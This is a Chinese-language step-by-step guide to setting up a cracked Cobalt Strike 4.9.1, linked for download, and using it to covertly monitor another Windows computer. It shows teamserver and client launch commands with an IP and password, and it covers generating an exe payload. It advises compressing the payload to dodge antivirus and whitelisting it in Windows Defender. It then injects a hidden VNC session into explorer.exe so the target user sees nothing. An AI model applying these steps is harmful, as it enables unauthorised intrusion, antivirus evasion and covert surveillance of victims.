介绍

Cobalt Strike (CS) 是一种基于C/S架构的商业渗透软件,适合多人进行团队协作进行内网渗透。它集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等功能。

CS分为两部分:客户端、服务端,依赖 Java 语言环境。

网盘下载(破解版 4.9.1)

安装

服务端用于提供会话管理服务,客户端用于连接服务器进行会话管理。

一个服务端可以为多个客户端提供服务,每个客户端应该使用 不同的用户名相同的连接密码 来使用服务器提供的服务。

可以使用同一台电脑部署服务器和客户端。

服务端和监控端必须安装JAVA环境,被监控端不需要任何配置。

服务端需要运行在Linux系统,客户端支持Linux和Windows系统。

服务端

JAVA环境安装

1
sudo apt install openjdk-17-jdk -y

客户端(监控端)

JAVA环境安装

1
sudo apt install openjdk-17-jdk -y

启动

服务端

启动服务

1
2
cd CobaltSrike_4.9.1/Server
./teamserver 47.237.94.141 password

47.237.94.141 应该修改为你的服务端IP地址

password 应该设置为你自定义的连接密码

或者放在后台运行

1
2
cd CobaltSrike_4.9.1/Server
nohup ./teamserver 47.237.94.141 password > cs.log 2>&1 &

客户端(监控端)

启动服务(Linux)

1
2
3
4
5
cd CobaltSrike_4.9.1/Client
# 修改执行权限
chmod 777 *
# 启动
./cobaltstrike-client.sh

启动服务(Windows)

进入 CobaltSrike_4.9.1/Client 目录。 双击运行下面的cmd文件:

cobaltstrike-client.cmd

登录

Alias 是连接名称,可以随便输入。

Host 设置为服务端的IP地址。

Port 设置为服务端的端口,默认50050,不用修改。

User 登录用户名,随便输入。

Password 连接密码,使用服务端设定的连接密码。

新建监听器

生成exe文件

将生成的exe文件压缩后发送给需要被监控的电脑,不压缩会直接报病毒被杀掉。

客户端(被监控端)

添加 Windows Defender 杀毒白名单

建议直接将exe放置的目录直接加白名单。

运行exe文件

双击exe文件运行即可。

可以在任务管理器看到进程,但是不会有任何界面响应的!

远程桌面监控

被控端运行exe后,在控制端可以看到上线新的会话了。

默认的VNC

在会话上右键,选择VNC,即可自动启动远程桌面监控。

需要等待大概十秒左右!!!

注入式隐藏VNC

可解决上面的默认VNC远程桌面显示不完整的问题。

通过上面操作,查看被控端的进程列表,找到 explorer.exePID 值。

在交互命令行中输入命令:

1
desktop 5136 x64 high

5136 就是上面获得的 explorer.exePID 值。

这样VNC就可以注入到资源管理器(explorer.exe)进程中,实现隐藏,同时能获取更稳定的监控。

关闭

被控端使用任务管理器关闭该exe进程即可!